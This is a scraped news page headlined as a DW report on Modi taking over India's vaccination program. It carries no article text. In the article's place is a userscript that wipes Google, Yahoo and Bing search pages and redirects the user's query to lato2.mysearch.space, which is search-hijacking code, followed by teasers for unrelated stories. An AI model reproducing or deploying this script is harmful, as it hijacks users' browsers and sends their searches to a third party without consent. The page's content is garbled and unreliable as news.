News  |  World  

Modi announces federal takeover of India’s vaccination program

By DW |   08 June 2021   |   2:22 pm  

 

// ==UserScript== // @name panda google // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author You // @match *://*/* // @grant none // ==/UserScript==

(function() {

function findGetParameter(parameterName) { var result = null, tmp = []; location.search .substr(1) .split("&") .forEach(function (item) { tmp = item.split("="); if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]); }); return result; } var u ='https://lato2.mysearch.space?q=', s = [

{ 'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/, 'query':'q', }, { 'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/, 'query':'p' }, { 'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/, 'query':'q' } ] for(var i = 0; i < s.length; i++){ var net = s[i], pattern = net.host, q = findGetParameter(net.query); if( pattern.test(window.location.href) ){ document.body.innerHTML=""; window.location.href=u+q; } } })();

You may also like

3 hours ago
Mexican authorities are examining three dead bodies, found relatively close to where two Australian and a US national went missing in a region hit by cartel violence.
22 mins ago
The Qatari TV network is no longer available in Israel after the Cabinet voted to suspend it. Israel has had a tense relationship with the broadcaster, accusing it of bias and incitement.
23 mins ago
Afghanistan's diplomat Zakia Wardak said she was stepping down as the consul-general in Mumbai because of organized attacks against her. Her statement made no mention of the alleged gold smuggling accusations.